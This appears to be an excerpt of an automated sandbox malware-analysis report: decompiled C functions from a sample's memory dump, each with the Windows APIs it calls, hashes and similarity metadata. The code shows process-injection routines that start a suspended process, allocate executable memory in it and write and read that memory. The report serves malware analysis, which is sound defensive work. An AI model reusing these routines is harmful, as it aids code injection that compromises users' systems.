                          					if(_t30 <= 0) {
                          						while(1) {
                          							L9:
                          							_t17 = _t30 - 1;
                          							 *_t41 = _t30 - 1;
                          							if(_t30 == 0) {
                          								break;
                          							}
                          							E006E91E0( *((intOrPtr*)(_t28 + _t17 * 4)));
                          							_t41 =  &(_t41[1]);
                          							_t30 =  *_t41;
                          						}
                          						E006E91E0(_t28);
                          						return 1;
                          					}
                          					_t38 = 0;
                          					do {
                          						E006E6570(_t37, _t33, 0, PathFindFileNameW( *(_t28 + _t38 * 4)));
                          						_t30 =  *_t41;
                          						_t38 = _t38 + 1;
                          					} while (_t38 < _t30);
                          					goto L9;
                          				}
                          				return 1;
                          			}

                          APIs
                          • RtlEnterCriticalSection.NTDLL(006F9BBC), ref: 006F0316
                          • RtlLeaveCriticalSection.NTDLL(006F9BBC), ref: 006F033F
                          • PathFindFileNameW.SHLWAPI(00000000), ref: 006F037B
                            • Part of subcall function 006F5020: GetFullPathNameW.KERNEL32(?,00000105,?,00000000), ref: 006F5064
                          • RtlLeaveCriticalSection.NTDLL(006F9BBC), ref: 006F03BA
                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
                          • Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
                          • Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
                          • Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID: CriticalSection$LeaveNamePath$EnterFileFindFull
                          • String ID:
                          • API String ID: 133812498-0
                          • Opcode ID: e71b6d6d018ba70e47a14480c0c90cb9507c2932c8150882f77fb01b194301c7
                          • Instruction ID: 29eb0d4e84b67b7378758be4075c11a3611a8c7f079cbd7ec43042a17c00f9d9
                          • Opcode Fuzzy Hash: e71b6d6d018ba70e47a14480c0c90cb9507c2932c8150882f77fb01b194301c7
                          • Instruction Fuzzy Hash: 3611B77270530A9BEB10BF65EC8AA3E77E7DF80745F01042CE689C7292EA719801C766
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 79%
                          			E006E6740(void* __ecx, void* __eflags, intOrPtr _a4) {
                          				char _v212;
                          				char _v312;
                          				char _v316;
                          				WCHAR* _v320;
                          				_Unknown_base(*)()* _t16;
                          				void* _t21;
                          				void* _t24;
                          				CHAR* _t28;
                          				void* _t29;
                          				WCHAR* _t31;
                          				_Unknown_base(*)()* _t32;
                          				void* _t33;
                          				void* _t34;
                          				void* _t36;
                          
                          				_t33 = __ecx;
                          				_t31 =  &_v212;
                          				_v320 = 0;
                          				_v316 = 0;
                          				E006F4520(_t31, 0x56);
                          				_t28 =  &_v312;
                          				E006F7160(_t28, 0x57);
                          				_t36 = _t34 + 0x10;
                          				_t16 = GetProcAddress(GetModuleHandleW(_t31), _t28);
                          				if(_t16 != 0) {
                          					_t32 = _t16;
                          					_t21 = E006EC380(_a4, 0, _t36, 0xffffffff);
                          					_t36 = _t36 + 0x10;
                          					if(_t21 != 0) {
                          						_t24 = E006E9CD0(lstrlenW(_v320) + _t22 + 2,  *(_t33 + 0x70), _v320, lstrlenW(_v320) + _t22 + 2);
                          						_t36 = _t36 + 0xc;
                          						if(_t24 != 0) {
                          							_t29 = _t24;
                          							_push(_t29);
                          							_push( &_v316);
                          							_push(1);
                          							_push(_t32);
                          							_push(_t33);
                          							E006F3FA0();
                          							_t36 = _t36 + 0x14;
                          							VirtualFreeEx( *(_t33 + 0x70), _t29, 0, 0x8000);
                          						}
                          					}
                          				}
                          				_t17 = _v320;
                          				if(_v320 != 0) {
                          					E006E91E0(_t17);
                          				}
                          				return _v316;
                          			}

                          APIs
                          • GetModuleHandleW.KERNEL32(?), ref: 006E6773
                          • GetProcAddress.KERNEL32(00000000,?), ref: 006E677B
                            • Part of subcall function 006EC380: MultiByteToWideChar.KERNEL32(00000000,00000000,0000FDE9,00000000,00000000,00000000,00000000,00000000,?,00000010,006E8EF7,?,0000FDE9,00000010,000000FF,00000010), ref: 006EC396
                            • Part of subcall function 006EC380: MultiByteToWideChar.KERNEL32(?,00000000,0000FDE9,?,00000000,00000000), ref: 006EC3C4
                          • lstrlenW.KERNEL32 ref: 006E67A4
                            • Part of subcall function 006E9CD0: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,00000000,?,00000000,?,?,006EDA93,?,?,00000080), ref: 006E9CE8
                            • Part of subcall function 006E9CD0: WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,006EDA93,?,?,00000080), ref: 006E9D07
                            • Part of subcall function 006F3FA0: ReadProcessMemory.KERNEL32(?,?,?,00000070), ref: 006F3FCD
                            • Part of subcall function 006F3FA0: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 006F4070
                            • Part of subcall function 006F3FA0: WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,00003000,00000040), ref: 006F4095
                          • VirtualFreeEx.KERNEL32(?,00000000,00000000,00008000), ref: 006E67E1
                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
                          • Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
                          • Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
                          • Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID: MemoryProcessVirtual$AllocByteCharMultiWideWrite$AddressFreeHandleModuleProcReadlstrlen
                          • String ID:
                          • API String ID: 2912094857-0
                          • Opcode ID: 5c66d289c4fe33498632a4de359206971ad0ca5e50136678f7c28c8239823433
                          • Instruction ID: 289c5b0603f56d45f4b82ae89cac350d0b2f025dabe59f67b399ebbabdb80993
                          • Opcode Fuzzy Hash: 5c66d289c4fe33498632a4de359206971ad0ca5e50136678f7c28c8239823433
                          • Instruction Fuzzy Hash: 9511B4B6A053007BE711AB35EC4AFBB76AEEF40745F04042CFA44C1291EA31D914CA62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 43%
                          			E006F3100(void* __ecx, void* __eflags, intOrPtr _a4, void* _a8) {
                          				char _v212;
                          				char _v312;
                          				_Unknown_base(*)()* _t10;
                          				void* _t17;
                          				CHAR* _t18;
                          				_Unknown_base(*)()* _t19;
                          				WCHAR* _t21;
                          				void* _t22;
                          				void* _t23;
                          				long* _t24;
                          				long* _t26;
                          
                          				_t23 = __ecx;
                          				 *_t24 = 0;
                          				_t21 =  &_v212;
                          				E006F4520(_t21, 0x56);
                          				_t18 =  &_v312;
                          				E006F7160(_t18, 0x9b);
                          				_t26 =  &(_t24[4]);
                          				_t10 = GetProcAddress(GetModuleHandleW(_t21), _t18);
                          				if(_t10 == 0) {
                          					L7:
                          					return  *_t26;
                          				}
                          				_t22 = _a8;
                          				_t19 = _t10;
                          				if(_t22 >= 0x10000) {
                          					_push(_t22);
                          					_t17 = E006E9CD0( *0x6f9d28() + 1,  *(_t23 + 0x70), _t22,  *0x6f9d28() + 1);
                          					_t26 =  &(_t26[3]);
                          					_t22 = _t17;
                          				}
                          				if(_t22 != 0) {
                          					_push(_t22);
                          					_push(_a4);
                          					_push(_t26);
                          					_push(2);
                          					_push(_t19);
                          					_push(_t23);
                          					E006F3FA0();
                          					_t26 =  &(_t26[6]);
                          					if(_t22 >= 0x10000 && _t22 != 0) {
                          						VirtualFreeEx( *(_t23 + 0x70), _t22, 0, 0x8000);
                          					}
                          				}
                          				goto L7;
                          			}

                          APIs
                          • GetModuleHandleW.KERNEL32(?), ref: 006F3134
                          • GetProcAddress.KERNEL32(00000000,?), ref: 006F313C
                          • lstrlen.KERNEL32(?), ref: 006F3158
                            • Part of subcall function 006E9CD0: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,00000000,?,00000000,?,?,006EDA93,?,?,00000080), ref: 006E9CE8
                            • Part of subcall function 006E9CD0: WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,006EDA93,?,?,00000080), ref: 006E9D07
                          • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 006F31A0
                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
                          • Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
                          • Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
                          • Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID: Virtual$AddressAllocFreeHandleMemoryModuleProcProcessWritelstrlen
                          • String ID:
                          • API String ID: 2409309907-0
                          • Opcode ID: 3fad7bc83337b975d4907d73e7d4795dc12ac38ff7e6f61aca7b5fb90ef1920a
                          • Instruction ID: ce1b2343b1158a6f232450a7adfecd7f66565a561848f24f733a1cd82b0e6834
                          • Opcode Fuzzy Hash: 3fad7bc83337b975d4907d73e7d4795dc12ac38ff7e6f61aca7b5fb90ef1920a
                          • Instruction Fuzzy Hash: 01110872A006047BE721A724EC49FBB76BFDFC5B41F140418F64882351EA354945C7B6
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E006E7440(intOrPtr __ecx, void* __eflags, intOrPtr* _a4, intOrPtr* _a8) {
                          				char _v216;
                          				intOrPtr _v220;
                          				signed int _v224;
                          				WCHAR* _v228;
                          				intOrPtr _v232;
                          				intOrPtr _v244;
                          				char _v248;
                          				struct _STARTUPINFOW _v316;
                          				signed int _v320;
                          				long _t42;
                          				WCHAR* _t43;
                          				int _t46;
                          				signed int _t51;
                          				intOrPtr _t54;
                          				signed int _t56;
                          				signed int _t63;
                          				signed int _t64;
                          				struct _PROCESS_INFORMATION* _t65;
                          				intOrPtr _t69;
                          				char* _t72;
                          				signed int _t73;
                          				short _t74;
                          				signed int _t75;
                          				void* _t77;
                          				intOrPtr* _t79;
                          
                          				_t69 = __ecx;
                          				_t72 =  &(_v316.lpReserved);
                          				E006F6610(_t72, 0, 0x128);
                          				 *((intOrPtr*)(_t72 - 4)) = 0x44;
                          				GetStartupInfoW( &_v316);
                          				E006F4520( &_v216, 0x55);
                          				_t79 = _t77 + 0x14;
                          				_t42 = 4;
                          				_t51 = 0;
                          				while( *((short*)(_t79 + 0x6c + _t51 * 2)) != 0) {
                          					_t51 = _t51 + 1;
                          					_t42 = _t42 + 2;
                          					if(_t51 != 0x7fffffff) {
                          						continue;
                          					} else {
                          						_v224 = 0;
                          						_v220 = 0x80070057;
                          						L18:
                          						_t43 = _v228;
                          						L19:
                          						if(_t43 != 0) {
                          							E006E91E0(_t43);
                          						}
                          						return _v232;
                          					}
                          				}
                          				_v224 = _t51;
                          				_v220 = 0;
                          				_t43 = E006E3180(_t42, 0);
                          				_t79 = _t79 + 8;
                          				__eflags = _t43;
                          				_v228 = _t43;
                          				if(_t43 == 0) {
                          					goto L19;
                          				}
                          				_t63 = _v224;
                          				__eflags = _t63 + 2;
                          				if(__eflags <= 0) {
                          					_t54 = 0x80070057;
                          					if(__eflags != 0) {
                          						 *_t43 = 0;
                          					}
                          					L14:
                          					_v220 = _t54;
                          					goto L18;
                          				}
                          				_v320 = _t63;
                          				 *_t79 = _t69;
                          				_t64 =  ~_t63;
                          				_t73 = 0;
                          				_t56 =  ~_t43;
                          				__eflags = 1;
                          				while(1) {
                          					_t74 =  *(_t79 + 0x6c + _t73 * 2) & 0x0000ffff;
                          					__eflags = _t74;
                          					if(_t74 == 0) {
                          						break;
                          					}
                          					_t43[_t73] = _t74;
                          					_t56 = _t56 + 0xfffffffe;
                          					_t22 = _t73 + 1; // 0x1
                          					_t75 = _t22;
                          					__eflags = _t64 + _t73 - 1;
                          					if(_t64 + _t73 == 1) {
                          						L10:
                          						__eflags = _t75 - _v320 - 2;
                          						_t62 =  ==  ? 0xfffffffe - _t56 :  ~_t56;
                          						 *((short*)( ==  ? 0xfffffffe - _t56 :  ~_t56)) = 0;
                          						_t54 = 0x8007007a;
                          						if(_t75 - _v320 == 2) {
                          							goto L14;
                          						}
                          						L16:
                          						_t65 =  &_v248;
                          						 *((intOrPtr*)(_t65 + 0x1c)) = 0;
                          						_t46 = CreateProcessW(0, _t43, 0, 0, 0, 4, 0, 0,  &_v316, _t65);
                          						__eflags = _t46;
                          						if(_t46 != 0) {
                          							 *_a4 = _v248;
                          							 *_a8 = _v244;
                          							_v232 = 1;
                          							 *((intOrPtr*)( *_t79 + 0x78)) = 1;
                          						}
                          						goto L18;
                          					}
                          					__eflags = _t73 - 0x7ffffffd;
                          					_t73 = _t75;
                          					if(__eflags != 0) {
                          						continue;
                          					}
                          					goto L10;
                          				}
                          				_t43[_t73] = 0;
                          				goto L16;
                          			}

                          APIs
                          • GetStartupInfoW.KERNEL32(?), ref: 006E746C
                          • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 006E7564
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
                          • Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
                          • Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
                          • Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID: CreateInfoProcessStartup
                          • String ID: W
                          • API String ID: 525363069-655174618
                          • Opcode ID: 135f1c579ff5fea9cc7e54e6f06a32f9df0c8e19d58b37006652722ed6182079
                          • Instruction ID: 6136d0fad03c1a325530789730ecf6a0d07f9fc3923af603fe266b39ad94db77
                          • Opcode Fuzzy Hash: 135f1c579ff5fea9cc7e54e6f06a32f9df0c8e19d58b37006652722ed6182079
                          • Instruction Fuzzy Hash: B641E0B15093409FE728DF25D845AABB7EAEF80310F108A1DF5968B390EB75D905CB92
                          Uniqueness

                          Uniqueness Score: -1.00%